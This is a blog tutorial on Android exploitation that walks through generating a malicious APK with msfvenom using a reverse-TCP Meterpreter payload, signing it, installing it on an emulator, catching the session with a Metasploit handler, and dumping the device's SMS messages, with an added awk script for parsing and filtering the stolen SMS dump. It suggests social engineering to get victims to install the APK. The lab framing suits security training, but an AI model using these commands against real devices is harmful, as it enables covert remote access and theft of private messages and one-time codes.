Lucifer

Android Exploitation

In previous posts, we saw how an Android device can be used as a penetration-testing platform. Let's switch sides and use the Android device as the target. In this post, we will build a malicious APK with the tools offered by the Metasploit Framework: we will use one of Metasploit's Android payloads and generate the APK with msfvenom, sign it, install it on an emulated device, and then work with the resulting Android Meterpreter session.


Step 1: Creating APK

Enter the following command to generate the APK file that will be distributed to the victim:

msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > SignApk/evilAndroid.apk


The address we enter for LHOST is the one the emulator uses to reach the host computer: the payload connects back to it from inside the emulated device, so the host's own loopback address would not work here.

It will take 2-3 minutes for the file to be created.

Step 2: Changing Directories

Once our APK is created, we need to sign it. This step is essential: Android will not install an unsigned APK. Signing is normally a multi-step process, but we can simplify it by using a pre-generated certificate and private key together with the signapk.jar utility. We saved all of them in the same directory as our APK. Change to this directory:

cd SignApk


Step 3: Signing APK

Run the command below to sign the APK. Our signed file will be saved as evilAndroidc.apk.

java -jar signapk.jar certificate.pem key.pk8 evilAndroid.apk evilAndroidc.apk


To make sure that the file was created, list the working directory (ls) and check that evilAndroidc.apk is present.

Step 4: Starting Metasploit Listener

Now let's start the Metasploit listener. We've done the step-by-step setup in other labs; this time we do it all at once with a one-liner:

msfconsole -L -q -x "use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp; set LHOST; set LPORT 4444; run"


The -q option is for "quiet": it suppresses the banner and version information. The -L option makes msfconsole use the system readline library. Note that LHOST is the host's own address this time (the address the handler binds to), not the address the emulator uses to reach the host.

Now open a new terminal tab with Ctrl + Shift + T.

Step 5: Starting Android Emulator

Enter the following command to start the Android emulator instance that we will use as our target:

android-sdk-linux/tools/emulator @android17 -no-window


It may take several minutes for the emulator instance to start. Be patient.

Step 6: Migrating Consoles

Next, we need to get our malicious APK onto the device. In a real-life scenario, you would need some social engineering to trick the device owner into downloading and installing your APK. Let's say we did that; from here on we play the victim.

Open up a new tab "Tab 3".

Step 7: Installing APK

To install the APK, enter the command below. Make sure to use the signed version of the APK, evilAndroidc.apk, not the original evilAndroid.apk:

adb install SignApk/evilAndroidc.apk


You will get a "device offline" error at first: it takes some time for the emulated device to register with the ADB server. If you are returned to the prompt, try again, and keep re-entering the command until you see the "Success" message (several attempts may be needed). Running adb wait-for-device first blocks until the device is registered and avoids most of the guessing, although the install can still fail until the system has finished booting.

Step 8: Launching App

Next, we need to launch the application. Opening apps from command line is a bit tricky: you need to know the name of the package and of the Activity. We looked it up for you, so just enter the following command to run the app:

adb shell am start com.metasploit.stage/.MainActivity


Step 9: Getting a Shell

Now go back to the Metasploit listener running in "Console Tab 1".


We got a Meterpreter shell!

Step 10: Using Meterpreter on Android

Android Meterpreter is similar to the Linux version that we used in other labs, however, it has some unique options as well. Enter help to see the available commands.


Step 11: Getting System Information

Enter sysinfo to get information about the target system:



Step 12: Migrating Consoles

One of the most useful Android Meterpreter commands is dump_sms, which does just that: it dumps all SMS messages stored on the device into a text file on the attacker's machine.

Migrate to "Console tab 3" to send an SMS message to our device.

Step 13: Sending SMS

We can use Telnet to send SMS messages to an emulated device through the emulator console. First, open a Telnet session to the console port (5554 is the port of the first emulator instance, which is why adb lists the device as emulator-5554):

telnet localhost 5554


Recent emulator versions require you to authenticate before accepting commands: enter auth followed by the token stored in ~/.emulator_console_auth_token on the host. Then enter sms send followed by a phone number and a message. You can use any values, just don't include dashes in the phone number and put the message in quotes, for example:

sms send 1112223333 "Hey there"

Now again switch back to console tab 1.

Step 14: Dumping SMS

Enter the dump_sms command:



Note the name of the dump file. It will be saved in the current working directory. Enter exit twice to close the Meterpreter shell and exit out of Metasploit.

Step 15: Reading SMS Dump

Enter the following command to read the SMS file (enter the file name with your timestamp):

cat sms_dump_<timestamp>.txt


We can see the contents of the messages as well as the associated metadata.
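Added example, not part of the original post: a small shell/awk helper that parses a dump_sms file into tab-separated records, so messages can be filtered by address or passed on to other tools instead of being read with cat. The file layout it expects is an assumption (a header block, then one numbered record per message with Type, Date, Address, Status and Message lines in which the field name is followed by a tab and a colon), and the sample written by make_sample_dump is constructed for this example; compare it with your own dump before relying on the parser. A message body containing a newline is not handled.

```shell
#!/bin/sh
# Added example: parse the text file written by Meterpreter's dump_sms.
# Assumed layout (not confirmed by the post): header lines such as
# "Date: ..." with no tab, then per-message records of the form
#   #1
#   ----------------------
#   Type<TAB>: Incoming
#   Date<TAB>: 2020-05-10 14:01:30
#   Address<TAB>: 1112223333
#   Status<TAB>: NOT_RECEIVED
#   Message<TAB>: Hey there
# Usage: sh sms_dump.sh sms_dump_<timestamp>.txt [address]
set -eu

# Constructed sample dump in the layout above (two messages, one of them
# containing ": " inside the body to make sure the parser does not split it).
make_sample_dump() {
    printf '=====================\n[+] SMS messages dump\n=====================\n\n'
    printf 'Date: 2020-05-10 14:02:11 +0000\nOS: Android 4.2.2 - Linux 3.4.0 (armv7l)\n'
    printf 'Remote IP: 127.0.0.1\nRemote Port: 45678\n\n'
    printf '#1\n----------------------\nType\t: Incoming\nDate\t: 2020-05-10 14:01:30\n'
    printf 'Address\t: 1112223333\nStatus\t: NOT_RECEIVED\nMessage\t: Hey there\n\n'
    printf '#2\n----------------------\nType\t: Outgoing\nDate\t: 2020-05-10 14:01:55\n'
    printf 'Address\t: 5550001234\nStatus\t: COMPLETE\nMessage\t: OTP: 483920\n\n'
}

# Print one line per message: number, type, date, address, body (tab-separated).
# Only lines whose field name is followed by a tab are treated as record fields,
# so the untabbed "Date:" line in the header is ignored.
sms_dump_to_tsv() {
    awk '
        function val(s) { sub(/^[^\t]*\t: /, "", s); return s }
        function emit()  { if (n != "") printf "%s\t%s\t%s\t%s\t%s\n", n, mtype, mdate, addr, msg }
        /^#[0-9]+$/  { emit(); n = substr($0, 2); mtype = mdate = addr = msg = "" }
        /^Type\t/    { mtype = val($0) }
        /^Date\t/    { mdate = val($0) }
        /^Address\t/ { addr = val($0) }
        /^Message\t/ { msg = val($0) }
        END          { emit() }
    ' "$1"
}

# Only the messages exchanged with one address (fourth column of the TSV).
sms_dump_from() {
    sms_dump_to_tsv "$1" | awk -v a="$2" 'BEGIN { FS = "\t" } $4 == a'
}

if [ -n "${1:-}" ]; then
    if [ -n "${2:-}" ]; then sms_dump_from "$1" "$2"; else sms_dump_to_tsv "$1"; fi
fi
```

Run it against a dump produced in Step 14 with sh sms_dump.sh sms_dump_<timestamp>.txt; adding an address as a second argument narrows the output to one conversation.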


That's it for this post; we hope you liked it. Please share it with your friends. More is on the way: check out the Payground shop or visit HERE.


©2020 by Payground. Proudly created with Wix.com